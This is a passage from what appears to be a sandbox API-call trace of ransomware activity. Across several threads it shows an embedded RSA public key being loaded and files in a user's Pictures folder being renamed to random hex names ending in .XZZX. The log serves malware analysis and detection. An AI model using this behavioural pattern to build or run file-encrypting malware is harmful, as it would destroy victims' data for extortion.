LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0191.434] lstrcpyW (in: lpString1=0x2caf460, lpString2="615936DC32228B708230065136576FB8.XZZX" | out: lpString1="615936DC32228B708230065136576FB8.XZZX") returned="615936DC32228B708230065136576FB8.XZZX" [0191.434] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0191.434] SetErrorMode (uMode=0x1) returned 0x1 [0191.434] lstrcpyW (in: lpString1=0x2caf860, lpString2="615936DC32228B708230065136576FB8.XZZX" | out: lpString1="615936DC32228B708230065136576FB8.XZZX") returned="615936DC32228B708230065136576FB8.XZZX" [0191.434] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xb0895215, Data2=0x7774, Data3=0x4cee, Data4=([0]=0xbc, [1]=0x6c, [2]=0x3a, [3]=0x23, [4]=0x2b, [5]=0x31, [6]=0x63, [7]=0x8e))) returned 0x0 [0191.434] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\615936DC32228B708230065136576FB8.XZZX") returned 80 [0191.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0191.434] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\D360F48423E57DD8B089521526B06220.XZZX") returned 80 [0191.434] StrStrW (lpFirst="615936DC32228B708230065136576FB8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 719 os_tid = 0xdcc [0191.590] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0191.590] lstrcpyW (in: lpString1=0x2caf460, lpString2="6274BC861B7171923C3788AB1F9255DA.XZZX" | out: lpString1="6274BC861B7171923C3788AB1F9255DA.XZZX") returned="6274BC861B7171923C3788AB1F9255DA.XZZX" [0191.590] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0191.590] SetErrorMode (uMode=0x1) returned 0x1 [0191.590] lstrcpyW (in: lpString1=0x2caf860, lpString2="6274BC861B7171923C3788AB1F9255DA.XZZX" | out: lpString1="6274BC861B7171923C3788AB1F9255DA.XZZX") returned="6274BC861B7171923C3788AB1F9255DA.XZZX" [0191.590] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x349eb790, Data2=0x544, Data3=0x4235, Data4=([0]=0x80, [1]=0x8b, [2]=0x58, [3]=0x7c, [4]=0x5e, [5]=0x3, [6]=0xc6, [7]=0x0))) returned 0x0 [0191.590] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6274BC861B7171923C3788AB1F9255DA.XZZX") returned 80 [0191.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0191.590] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\13BE9240015C9F14349EB7900427835C.XZZX") returned 80 [0191.590] StrStrW (lpFirst="6274BC861B7171923C3788AB1F9255DA.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 720 os_tid = 0xdd0 [0191.755] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0191.755] lstrcpyW (in: lpString1=0x2caf460, lpString2="693610CE0E824D54F2368B0112B7319C.XZZX" | out: lpString1="693610CE0E824D54F2368B0112B7319C.XZZX") returned="693610CE0E824D54F2368B0112B7319C.XZZX" [0191.755] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0191.755] SetErrorMode (uMode=0x1) returned 0x1 [0191.755] lstrcpyW (in: lpString1=0x2caf860, lpString2="693610CE0E824D54F2368B0112B7319C.XZZX" | out: lpString1="693610CE0E824D54F2368B0112B7319C.XZZX") returned="693610CE0E824D54F2368B0112B7319C.XZZX" [0191.755] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x5881535, Data2=0xfc0, Data3=0x443c, Data4=([0]=0x8e, [1]=0x10, [2]=0x79, [3]=0xfe, [4]=0x37, [5]=0xf4, [6]=0x14, [7]=0x12))) returned 0x0 [0191.755] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\693610CE0E824D54F2368B0112B7319C.XZZX") returned 80 [0191.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0191.755] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1F4E02C00432B1000588153506FD9548.XZZX") returned 80 [0191.755] StrStrW (lpFirst="693610CE0E824D54F2368B0112B7319C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 721 os_tid = 0xdd4 [0191.902] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0191.902] lstrcpyW (in: lpString1=0x2caf460, lpString2="6C73D824191052A8389547C51D5A36F0.XZZX" | out: lpString1="6C73D824191052A8389547C51D5A36F0.XZZX") returned="6C73D824191052A8389547C51D5A36F0.XZZX" [0191.902] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0191.902] SetErrorMode (uMode=0x1) returned 0x1 [0191.902] lstrcpyW (in: lpString1=0x2caf860, lpString2="6C73D824191052A8389547C51D5A36F0.XZZX" | out: lpString1="6C73D824191052A8389547C51D5A36F0.XZZX") returned="6C73D824191052A8389547C51D5A36F0.XZZX" [0191.902] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xea11ae12, Data2=0x3bbe, Data3=0x4748, Data4=([0]=0x98, [1]=0xd3, [2]=0x1a, [3]=0x0, [4]=0xe1, [5]=0x4a, [6]=0x14, [7]=0x6d))) returned 0x0 [0191.902] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6C73D824191052A8389547C51D5A36F0.XZZX") returned 80 [0191.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0191.902] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\CC3D575C10A27F70EA11AE12136D63B8.XZZX") returned 80 [0191.902] StrStrW (lpFirst="6C73D824191052A8389547C51D5A36F0.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 722 os_tid = 0xdd8 [0192.058] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0192.058] lstrcpyW (in: lpString1=0x2caf460, lpString2="6D777C541DA727448F863C8E21C80B8C.XZZX" | out: lpString1="6D777C541DA727448F863C8E21C80B8C.XZZX") returned="6D777C541DA727448F863C8E21C80B8C.XZZX" [0192.058] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0192.058] SetErrorMode (uMode=0x1) returned 0x1 [0192.058] lstrcpyW (in: lpString1=0x2caf860, lpString2="6D777C541DA727448F863C8E21C80B8C.XZZX" | out: lpString1="6D777C541DA727448F863C8E21C80B8C.XZZX") returned="6D777C541DA727448F863C8E21C80B8C.XZZX" [0192.058] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xed5a0cc3, Data2=0x4ff6, Data3=0x4aff, Data4=([0]=0x94, [1]=0x6d, [2]=0x38, [3]=0xc3, [4]=0x22, [5]=0x8, [6]=0x51, [7]=0xd5))) returned 0x0 [0192.058] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6D777C541DA727448F863C8E21C80B8C.XZZX") returned 80 [0192.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0192.058] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DE787062176CC20AED5A0CC31A37A652.XZZX") returned 80 [0192.058] StrStrW (lpFirst="6D777C541DA727448F863C8E21C80B8C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 723 os_tid = 0xddc [0192.214] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0192.214] lstrcpyW (in: lpString1=0x2caf460, lpString2="6E0684500109FC98CFD71110053FE0E0.XZZX" | out: lpString1="6E0684500109FC98CFD71110053FE0E0.XZZX") returned="6E0684500109FC98CFD71110053FE0E0.XZZX" [0192.214] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0192.214] SetErrorMode (uMode=0x1) returned 0x1 [0192.214] lstrcpyW (in: lpString1=0x2caf860, lpString2="6E0684500109FC98CFD71110053FE0E0.XZZX" | out: lpString1="6E0684500109FC98CFD71110053FE0E0.XZZX") returned="6E0684500109FC98CFD71110053FE0E0.XZZX" [0192.214] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xdfa861a9, Data2=0xa49d, Data3=0x43b5, Data4=([0]=0x8d, [1]=0x9b, [2]=0xb9, [3]=0xec, [4]=0x70, [5]=0x14, [6]=0x6d, [7]=0x4f))) returned 0x0 [0192.214] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6E0684500109FC98CFD71110053FE0E0.XZZX") returned 80 [0192.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0192.214] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\08D428A52B897A01DFA861A92E545E49.XZZX") returned 80 [0192.214] StrStrW (lpFirst="6E0684500109FC98CFD71110053FE0E0.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 724 os_tid = 0xde0 [0192.370] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0192.370] lstrcpyW (in: lpString1=0x2caf460, lpString2="7030D20732FB05AE512C0EDB3744E9F6.XZZX" | out: lpString1="7030D20732FB05AE512C0EDB3744E9F6.XZZX") returned="7030D20732FB05AE512C0EDB3744E9F6.XZZX" [0192.370] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0192.370] SetErrorMode (uMode=0x1) returned 0x1 [0192.370] lstrcpyW (in: lpString1=0x2caf860, lpString2="7030D20732FB05AE512C0EDB3744E9F6.XZZX" | out: lpString1="7030D20732FB05AE512C0EDB3744E9F6.XZZX") returned="7030D20732FB05AE512C0EDB3744E9F6.XZZX" [0192.371] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x6aa6bf73, Data2=0x4f2f, Data3=0x496d, Data4=([0]=0xa2, [1]=0x72, [2]=0x1b, [3]=0xe, [4]=0x69, [5]=0x5, [6]=0xd9, [7]=0x47))) returned 0x0 [0192.371] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7030D20732FB05AE512C0EDB3744E9F6.XZZX") returned 80 [0192.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0192.371] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\09B1A31D16B61E036AA6BF731981024B.XZZX") returned 80 [0192.371] StrStrW (lpFirst="7030D20732FB05AE512C0EDB3744E9F6.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 725 os_tid = 0xde4 [0192.526] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0192.526] lstrcpyW (in: lpString1=0x2caf460, lpString2="7852C7A011E028AD2E2E29A016150CF5.XZZX" | out: lpString1="7852C7A011E028AD2E2E29A016150CF5.XZZX") returned="7852C7A011E028AD2E2E29A016150CF5.XZZX" [0192.526] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0192.526] SetErrorMode (uMode=0x1) returned 0x1 [0192.526] lstrcpyW (in: lpString1=0x2caf860, lpString2="7852C7A011E028AD2E2E29A016150CF5.XZZX" | out: lpString1="7852C7A011E028AD2E2E29A016150CF5.XZZX") returned="7852C7A011E028AD2E2E29A016150CF5.XZZX" [0192.526] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xaca5e4d5, Data2=0xf49a, Data3=0x49f0, Data4=([0]=0x88, [1]=0xe3, [2]=0x10, [3]=0xa6, [4]=0xfa, [5]=0x15, [6]=0x52, [7]=0x71))) returned 0x0 [0192.526] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7852C7A011E028AD2E2E29A016150CF5.XZZX") returned 80 [0192.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0192.526] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\F9E6AC2246A53A60ACA5E4D549701EA8.XZZX") returned 80 [0192.526] StrStrW (lpFirst="7852C7A011E028AD2E2E29A016150CF5.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 726 os_tid = 0xde8 [0192.682] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0192.682] lstrcpyW (in: lpString1=0x2caf460, lpString2="7ABC26D22C977F5CF918EABE30B863A4.XZZX" | out: lpString1="7ABC26D22C977F5CF918EABE30B863A4.XZZX") returned="7ABC26D22C977F5CF918EABE30B863A4.XZZX" [0192.682] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") 